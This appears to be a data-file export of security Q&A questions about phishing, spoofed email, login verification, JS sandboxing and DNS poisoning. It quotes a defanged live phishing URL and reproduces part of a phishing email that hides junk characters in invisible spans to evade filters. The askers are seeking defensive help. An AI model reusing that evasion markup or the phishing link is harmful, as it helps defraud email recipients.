 &lt;p&gt;Given this, my assumption is that such a system may provide more security and simplicity than a password one can. However, &lt;em&gt;why is this not being done, and, should it be done; am I missing something?&lt;/em&gt; Or should I stick to the mainstream password setup and just live with it - any responses would be greatly appreciated!&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;strong&gt;Side notes&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;I'm aware of client certificates which this has parallels to, but they seem to use complicated terminology and UX for a user to understand, thus they doesn't get used all that much. On a similar thread then, it may make a user feel odd not using a password; it may be perceived to be &lt;em&gt;less&lt;/em&gt; secure. (?)&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Provided the technique is sound and the 'perception issue' isn't a concern, I intend to opensource the implemented solution for both greater security/ simplicity on the web with a corresponding full audit of the implementation.&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;web-application&gt;&lt;mobile&gt;&lt;rsa&gt;</t>
  </si>
  <si>
    <t>Security Team and Security in a small-medium organization/startup</t>
  </si>
  <si>
    <t>&lt;p&gt;How should one structure and how should a Security Team work in an agile organization (100 devs).&lt;/p&gt;
 &lt;p&gt;Found this article:
 &lt;a href="https://kislayverma.com/organizations/independence-autonomy-and-too-many-small-teams/" rel="nofollow noreferrer"&gt;https://kislayverma.com/organizations/independence-autonomy-and-too-many-small-teams/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Where I agree with it, for software dev, I am not sure if this will be applicable to Security Teams.&lt;/p&gt;
 &lt;p&gt;Security Team ideally should deliver &amp;quot;security&amp;quot; of the company, however, a team cannot do it alone, we rely on other teams (devs for code, devops for infra), employees (phishing) and also need to collaborate a lot.&lt;/p&gt;
 &lt;p&gt;How would you tackle security and Security Teams in an agile organization?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;compliance&gt;&lt;defense&gt;&lt;risk-management&gt;&lt;devops&gt;</t>
  </si>
  <si>
    <t>How to deal with these legit-looking major-company phishing emails?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm having trouble figuring out to best identify or deal with phishing spoofs when the email address in the FROM field looks legit. Like &lt;code&gt;From: NORTONquickbooks@notification.intuit.com&lt;/code&gt; that I can tell from reading the email that it's a spoof. If I get into the message source, it'll have Reply-To be something that shows obvious phishing like &lt;code&gt;nornor385@hotmail.com&lt;/code&gt; (I don't mind exposing a phisher).&lt;/p&gt;
 &lt;p&gt;Even though I've been very good at identifying email scams, one of these slipped by me the first time and I ended up clicking a link to investigate if someone had purchased something using my email, and only realized after getting halfway through login that it was fake (I hadn't finished typing in the password, and I changed it quickly after that anyway after closing the page).&lt;/p&gt;
 &lt;p&gt;So, when I'm telling friends and family how to avoid spoofs, I can't rely anymore on &amp;quot;the email will not look legit&amp;quot;, because this one looks as legit as I can imagine Intuit/Quickbooks would look.&lt;/p&gt;
 &lt;p&gt;I've already reported these emails to Intuit/Quickbooks, with no response, and posting to their public customer support forum only got the email addresses obscured in the posts, and the response team's boilerplate replies, showing they're just blissfully unaware that I'm telling them that their own advice to see if the email address looks legit doesn't work in these cases. They either don't understand or don't care. Or maybe they're a part of these spoofs? I can't tell.&lt;/p&gt;
 &lt;p&gt;Anyway, what are we to do about this? I keep reporting them as phishing, spoof, fake, etc, and they keep showing up. I suppose I can filter them out, but since they're using a legit-looking FROM email, any I'd get legitimately would also be filtered out... not good. What's the solution to these?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to verify Google sign-in screen is legit? (Linux Desktop)</t>
  </si>
  <si>
    <t>&lt;p&gt;I've installed an Electron app "Google Play Music Desktop Player" which presents a Google login screen:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/9EHtN.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/9EHtN.png" alt="Login screen that appears to be from Google"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This is in a standalone window with no URL displayed. Although I have no reason not to trust this app, how can I be sure that this login screen is genuine?&lt;/p&gt;
 &lt;p&gt;I'm running Chrome on Fedora.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;chrome&gt;&lt;phishing&gt;&lt;desktop&gt;&lt;oauth2&gt;</t>
  </si>
  <si>
    <t>How to prevent phishing mails from being successful?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'd like to know what the best methods are to prevent success of phising mails.&lt;br&gt;
 This question contains the following subquestions: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;What are the &lt;strong&gt;best ways to determine&lt;/strong&gt; incoming phising mails (on a Server and Client side)?&lt;/li&gt;
 &lt;li&gt;What types of &lt;strong&gt;attachements/senders&lt;/strong&gt; should generally be blocked?&lt;/li&gt;
 &lt;li&gt;How do I &lt;strong&gt;explain/train my users&lt;/strong&gt; that they shouldn't &lt;strong&gt;trust every mail&lt;/strong&gt; that they're getting?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;If you think that there are more relevant questions on this topic, feel free to edit or let me know.&lt;br&gt;
 If you have additional information about the topic, feel free to add it to your answer. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I edited my question to be more clear, although the question you linked answers some of my question, it does not go into the same direction and most of my question is still unanswered. Thanks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Whitelist Simulated phishing landing page</t>
  </si>
  <si>
    <t>&lt;p&gt;We are running a simulated phishing campaign and one of the landing pages has been blacklisted by google. If you try to visit it in chrome you get the big, red warning page "Deceptive site ahead" (works OK in other browsers).&lt;/p&gt;
 &lt;p&gt;I assume one of our users reported it, thinking it was a real phishing page (kudos for that!) but now we have the problem that other users who are clicking the links in the emails we send are seeing the warning and not continuing, so we are not collecting data on them, or testing to see if they would go further and enter their credentials. Most importantly, we are missing the opportunity to train users who need that training!&lt;/p&gt;
 &lt;p&gt;I followed the "report a detection problem" link last week but the domains are still blacklisted. This is my question:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Is there a way to whitelist our landing pages with google and the other browser makers, so even though they look like phishing pages, they don't get blacklisted in the future?&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;whitelist&gt;</t>
  </si>
  <si>
    <t>Can an attacker steal one's credentials if they never ask for it?</t>
  </si>
  <si>
    <t>&lt;p&gt;Can a website that never asks for one's credentials still steal one's credentials?&lt;/p&gt;
 &lt;p&gt;If yes, how?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Sandboxing untrusted JavaScript execution by redeclaring variables</t>
  </si>
  <si>
    <t>&lt;p&gt;Some irrelevant background (read only if you want to say "no, just use an iframe")&lt;/p&gt;
 &lt;blockquote class="spoiler"&gt;
  &lt;p&gt; &lt;strong&gt;TL;DR: This is just an academic discussion. Please don't turn this into an XY question.&lt;/strong&gt;
  I am making a static webpage hosted on GitHub pages that connects to some third-party game server implementing a certain WebSocket protocol. I am considering an optional feature to implement some Turing-complete logic to be evaluated client-side without contacting server. I know that &lt;code&gt;&amp;lt;iframe&amp;gt;&lt;/code&gt; is going to solve the problem, but I'm looking into other approaches and find out why they don't work.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;h2&gt;Scenario&lt;/h2&gt;
 &lt;p&gt;Suppose that I downloaded a string &lt;code&gt;jsCode&lt;/code&gt; containing arbitrary JavaScript code from a (potentially malicious) third-party server via a WebSocket. I want to allow the code to implement basic Turing-complete logic, especially form data validation, as well as to touch a restricted set of APIs, e.g. to send some data into the WebSocket that &lt;code&gt;jsCode&lt;/code&gt; was received from.&lt;/p&gt;
 &lt;p&gt;(This is also why iframe was not my first choice; I don't want to create a DOM at all)&lt;/p&gt;
 &lt;p&gt;The third-party server address is inputted by the user, so in case &lt;code&gt;jsCode&lt;/code&gt; does something malicious (to the extent that the user notices), I am expecting to see that all effects are cleared when the user clicks &lt;kbd&gt;F5&lt;/kbd&gt;.&lt;/p&gt;
 &lt;p&gt;Another potential way of attacking is a &lt;code&gt;while(true){}&lt;/code&gt; that hangs/crashes the page, but since the user knows the server hangs the page, they won't connect to that server next time, so the effects are also cleared when the user clicks &lt;kbd&gt;F5&lt;/kbd&gt;.&lt;/p&gt;
 &lt;p&gt;So there are two main things that I don't want the arbitrary code to do:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;make it look as if the user is in another page (particularly phishing sites), especially downloading files&lt;/li&gt;
 &lt;li&gt;has lasting effect after &lt;kbd&gt;F5&lt;/kbd&gt; reloading
 &lt;ul&gt;
 &lt;li&gt;In particular, my static page stores the connection history (and potentially credentials to other third-party servers) in &lt;code&gt;localStorage&lt;/code&gt;, and I don't want the arbitrary script to access it.&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;h2&gt;Method&lt;/h2&gt;
 &lt;p&gt;The method in question is to redeclare all variables that the script can access. In this way, the script cannot access any JS values (not even global values) except those explicitly passed to it via function parameters:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;function evalFunction(jsCode) {
  const vars = ["jsCode", "name", "fx", "ex"] // these may not be in window
  for(const name in window) vars.push(name) // regardless of hasOwnProperty()
  const fx = new Function(`var ${vars.join()}; ${jsCode}`)
  try{
  return [true, fx()]
  }catch(ex){
  return [false, ex]
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;In case I want to expose some stateless libraries such as Math, I can wrap them in closures to pass as arguments to the function. If implemented carefully, this will not expose more danger than the argument-less case like the code above, so let's ignore this part for this question.&lt;/p&gt;
 &lt;p&gt;I have created a jsfiddle out of the hypothesized mechanism: &lt;a href="https://jsfiddle.net/16rb8cxe/6/" rel="nofollow noreferrer"&gt;https://jsfiddle.net/16rb8cxe/6/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It seems to effectively block access to &lt;code&gt;location&lt;/code&gt; access.&lt;/p&gt;
 &lt;p&gt;I am mostly confident that this has other loopholes. Can you provide example code to produce undesired effect as indicated above (or other effects that you think would still be very undesirable)?&lt;/p&gt;
 &lt;p&gt;(In case anyone notices, I created the same question on CodeReview.SE, but I flagged to close it for off-topic)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;xss&gt;&lt;javascript&gt;&lt;sandbox&gt;</t>
  </si>
  <si>
    <t>Understanding processes in "people, process and technology"</t>
  </si>
  <si>
    <t>&lt;p&gt;In the "people, process and technology" security model popularized by Bruce Schneier - &lt;a href="https://www.schneier.com/blog/archives/2013/01/people_process.html" rel="nofollow noreferrer"&gt;link&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It is discussed how exploits/attacks can occur on any of these 3 broad levels.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;For exploiting technology, that is relatively common. Pentests, exploiting bugs, etc.&lt;/p&gt;
 &lt;p&gt;For exploiting people, we see that via phishing, social engineering, etc. (there is some element of exploitation using technology involved)&lt;/p&gt;
 &lt;p&gt;In processes however, I am not sure how these are exploited.&lt;/p&gt;
 &lt;p&gt;My questions are thus:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;What does a "process" mean? Is it referring to some set of rules (like an algorithm) that people/technology follow?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Theoretically, how would a process be exploited? (any theoretical example will do)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Has a process ever been exploited in reality? If so, what was it and how was the process exploited?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;process&gt;</t>
  </si>
  <si>
    <t>Can attempting to extract an encrypted .rar file install a malware?</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently, I have accidentally found myself on a phishing website that looked extremely similar to another website. From there I downloaded a .rar file and proceeded to extract it. However, the .rar file was encrypted with a password, so after trying to extract it for a while, I gave up and removed the file.&lt;/p&gt;
 &lt;p&gt;Looking at that site again, I noticed that the domain is one letter off of the actual website I was trying to reach. So I am a little bit worried that the .rar file I downloaded earlier somehow exploited the .rar extraction software to execute some kind of malware. &lt;/p&gt;
 &lt;p&gt;I googled around and found that some extraction software may automatically run some sort of installation file &lt;strong&gt;after&lt;/strong&gt; extraction, but in my case, the file was encrypted with a password, so I've only tried to extract it. &lt;/p&gt;
 &lt;p&gt;Is it possible to accidentally run a malware this way?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why is phishing becoming synonymous with ransomware?</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;a href="https://en.wikipedia.org/wiki/Phishing" rel="nofollow noreferrer"&gt;Wikipedia definition of phishing&lt;/a&gt; is:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;But, now I'm tired of journalists in the mainstream media and some IT people, continually equate phishing with ransomware. They are different right?&lt;/p&gt;
 &lt;p&gt;Ransomware emails generally do NOT ask you to divulge any information. They just want you to click on the attachment or URL. But phishing and ransomware are often mentioned in the same breath.&lt;/p&gt;
 &lt;p&gt;I'd love to hear other opinions on this.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How much information, at maximum, can a phisher/scammer obtain?</t>
  </si>
  <si>
    <t>&lt;p&gt;My iPhone was recently stolen and since then I've been receiving messages and emails saying that 'a sound was played on your iPhone' or 'your iPhone was found. Visit here to confirm your location'. The numbers and email addresses are clearly fake.&lt;/p&gt;
 &lt;p&gt;I was wondering what &lt;em&gt;can&lt;/em&gt; he/she obtain, except from my Apple ID, from me? How much can he/she do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>What are these links that have been sent to me multiple times on facebook?</t>
  </si>
  <si>
    <t>&lt;p&gt;2 friends of mine have sent me very suspicious links on facebook, which ask me for credentials on an external site. Entering &lt;code&gt;hello@example.com&lt;/code&gt; in the username, and &lt;code&gt;1234&lt;/code&gt; for the password let me in, and redirect me to some car specifications, even though the post said that it was a video.&lt;/p&gt;
 &lt;p&gt;I accessed this through a phone, and chrome extensions don't apply there AFAIK, am I safe? &lt;/p&gt;
 &lt;p&gt;I have seen previous questions on SE which suggest that it is possible to buffer overflow an image with metadata, that gets executed with some memory address trick (the question can be found at: &lt;a href="https://superuser.com/questions/160852/can-you-really-get-a-trojan-in-an-image-file-and-if-so-how-will-it-be-executed"&gt;Can you get a trojan in an image file?&lt;/a&gt;). Could something similar apply to browsers and links?&lt;/p&gt;
 &lt;p&gt;Apart from that, it could just be any old phishing attack, but alot of people posted the exact same link on FB. A friend had reportedly recieved the same link from his relatives. Does anyone know the origin of this?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;UPDATE: Decided to view page's Javascript with TOR (Noscript of course). I will pastebin the deobf code. Its full of obfuscation, and written in 1 line, making it time-consuming to space apart. Also, the title, and some JS is written in things like &lt;code&gt;&amp;amp;#3626&lt;/code&gt;, etc.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;I am posting the link here if someone recognizes it, but PLEASE don't access it.&lt;/p&gt;
 &lt;p&gt;hxxp://ngovanhungxyz1.com/linhdeptraina/vipcute/chat/?utm_source=Facebook&amp;amp;utm_medium=X%C3%A3%20h%E1%BB%99i&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;A screenshot of the page looks like this:
 &lt;a href="https://i.stack.imgur.com/p9ZlV.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/p9ZlV.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It is full of badly translated Czech, and notice some untranslated segments at the bottom too. The header is completely missing content too.&lt;/p&gt;</t>
  </si>
  <si>
    <t>DNS hijacking/poisoning effect on URL/URI and password manager autotype/autofill</t>
  </si>
  <si>
    <t>&lt;p&gt;A benefit to password managers, at least some of them, is that they can look at the URL and only use autotype/autofill when on the correct site, which can help prevent pharming since if instead of &lt;a href="https://www.example.com/" rel="nofollow noreferrer"&gt;https://www.example.com/&lt;/a&gt; you go to examp1e dot com it won't autofill your credentials. What I want to know, and can't find anywhere, is whether DNS hijacking or poisoning, when taking you to a different site, will show to the browser, the user, and the password manager as the site you meant to go to or the fake one. That is, if you actually type example.com, and the browser thinks you're going to example.com because it's following the malicious DNS to maliciouswebsite dot com, does it show where it thinks you are or is it somehow able to resolve the actual URL and show that? I realize this is a very unlikely possibility, but I'm curious if the password manager would try to autofill on the malicious site because instead of example.com being resolved as x.x.x.x it's resolved as y.y.y.y, but as far as the browser and password manager know it's still example.com, or if it would go to y.y.y.y but since the actual URL for that is maliciouswebsite dot com that's what would ultimately be shown.&lt;/p&gt;
 &lt;p&gt;As a secondary, related question, if a public wifi router has been compromised for DNS poisoning, how and when does this affect your device when connecting to it, i.e. poisoning your DNS cache? Does it happen immediately upon connecting, or only for each query/entry as it's made?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;password-management&gt;&lt;dns&gt;&lt;phishing&gt;&lt;url&gt;&lt;dns-spoofing&gt;</t>
  </si>
  <si>
    <t>How is "security word" safe from man in the middle attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;In this &lt;a href="https://ibank.horiconbank.com/servlet/SLogin?template=/c/custom/help/mfaHelp.vm" rel="nofollow"&gt;bank site&lt;/a&gt; I read the following lines&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Item #2 - You will also need to create a "Security Word". This allows you to verify that you have reached our Internet Banking site, and not some other site. Every time you attempt to log in to your accounts, we will send you a graphical representation of the Security Word that you created. If you do not see that Security Word or it is not the one you created then you know that you are NOT at OUR site. If this happens, please contact us immediately.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;It says that bank displays the security word so that user can know that if he/she has reached the correct site, but I don't understand how it prevents man-in-middle attack.&lt;/p&gt;
 &lt;p&gt;The attacker can ask victim to enter the credentials, which then it can use to send REST back-end request to original bank site, which will return an html containing the security word of the victim, which can easily be parsed and can be shown on phishing site. So how does this security word actually help?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;attack-prevention&gt;&lt;man-in-the-middle&gt;</t>
  </si>
  <si>
    <t>Spam mail from own mailserver, but there is no outgoing mail in postfix log?</t>
  </si>
  <si>
    <t>&lt;p&gt;Today I received a phishing mail from my own (valid) sender address (info@example.com).&lt;/p&gt;
 &lt;p&gt;I checked the e-mail header and see the mail was received by my valid mailserver.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received: from mail.example.com ([::1]:36128) by domain.1blu.de (kopano-dagent) with LMTP; Mon, 14 Nov 2022 04:45:45 +0100
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;SPF, DMARC and DKIM are not valid. There is no outgoing mail in my postfix log.
 How the spammer can send these emails?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;email-spoofing&gt;&lt;postfix&gt;</t>
  </si>
  <si>
    <t>How would google know someone has the password for my web host email?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a confusing email from Google today. It had the subject 'Critical security alert' and the body said in part 'Google has become aware that someone else knows your password, and we've taken steps to protect your account.'&lt;/p&gt;
 &lt;p&gt;Apparently these are legitimate, and I've confirmed the links and message headers don't look like a phishing attempt. &lt;/p&gt;
 &lt;p&gt;Image: &lt;a href="https://imgur.com/a/cvpfh3k" rel="noreferrer"&gt;https://imgur.com/a/cvpfh3k&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The odd thing is that the email address listed is not a Gmail address - it is an email associated with one of my web hosting accounts. We fetch mail from this account via POP3 into our Gmail account.&lt;/p&gt;
 &lt;p&gt;The text is unambiguous - they state plainly they know someone knows the password to this account. But how? Google has no special access to the account. They presumably have the plaintext copy of the password available for POP3 authentication, so if there was a data breach on this storage at google then I guess that's one way, but I'm coming up blank on anything else. And the text 'sign back in' sounds like they meant to send it for Gmail but I don't know how to ask them.&lt;/p&gt;
 &lt;p&gt;Even if my poor security hygiene meant a third party had access how would Google know?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;google&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>Strange phishing email</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a strange phishing email the other day that seemed to use &lt;code&gt;span&lt;/code&gt; tags to encode "hidden" values within the email's body:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&amp;gt;
 &amp;lt;div dir="ltr"&amp;gt;
  &amp;lt;p&amp;gt;P&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;l&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;84&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;35&amp;lt;/span&amp;gt;a&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;44&amp;lt;/span&amp;gt;s&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;66&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt; C&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;52&amp;lt;/span&amp;gt;o&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;n&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;f&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;i&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;r&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;12&amp;lt;/span&amp;gt;m&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;75&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;53&amp;lt;/span&amp;gt;y&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;o&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;u&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;24&amp;lt;/span&amp;gt;r&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;83&amp;lt;/span&amp;gt;s&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;66&amp;lt;/span&amp;gt;a&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;61&amp;lt;/span&amp;gt;c&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;c&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;23&amp;lt;/span&amp;gt;o&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;52&amp;lt;/span&amp;gt;u&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;55&amp;lt;/span&amp;gt;n&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;t&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;74&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;87&amp;lt;/span&amp;gt;i&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;61&amp;lt;/span&amp;gt;s&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;33&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;f&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;31&amp;lt;/span&amp;gt;i&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;11&amp;lt;/span&amp;gt;n&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;21&amp;lt;/span&amp;gt;a&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;62&amp;lt;/span&amp;gt;l&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;61&amp;lt;/span&amp;gt;n&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;12&amp;lt;/span&amp;gt;o&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;43&amp;lt;/span&amp;gt;w&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;23&amp;lt;/span&amp;gt;.&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;
  &amp;lt;br&amp;gt;o&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;61&amp;lt;/span&amp;gt;p&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;32&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;40&amp;lt;/span&amp;gt;n&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;52&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;a&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;82&amp;lt;/span&amp;gt;t&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;31&amp;lt;/span&amp;gt;t&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;44&amp;lt;/span&amp;gt;a&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;49&amp;lt;/span&amp;gt;c&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;h&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;82&amp;lt;/span&amp;gt;m&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;33&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;92&amp;lt;/span&amp;gt;n&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;44&amp;lt;/span&amp;gt;t&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;s&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;62&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;51&amp;lt;/span&amp;gt;d&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;48&amp;lt;/span&amp;gt;o&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;82&amp;lt;/span&amp;gt;c&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;x&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;53&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;61&amp;lt;/span&amp;gt;h&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;47&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;r&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;62&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;71&amp;lt;/span&amp;gt;t&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;45&amp;lt;/span&amp;gt;o&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;v&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;64&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;67&amp;lt;/span&amp;gt;r&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;94&amp;lt;/span&amp;gt;i&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;88&amp;lt;/span&amp;gt;f&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;y&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;93&amp;lt;/span&amp;gt; &amp;lt;span style="color:transparent;font-size:0px"&amp;gt;45&amp;lt;/span&amp;gt;i&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;74&amp;lt;/span&amp;gt;t&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;99&amp;lt;/span&amp;gt;.
  &amp;lt;br&amp;gt;
  &amp;lt;br&amp;gt;&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;42&amp;lt;/span&amp;gt;S&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;83&amp;lt;/span&amp;gt;i&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;24&amp;lt;/span&amp;gt;n&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;89&amp;lt;/span&amp;gt;c&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;84&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;73&amp;lt;/span&amp;gt;r&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;62&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;12&amp;lt;/span&amp;gt;l&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;13&amp;lt;/span&amp;gt;y
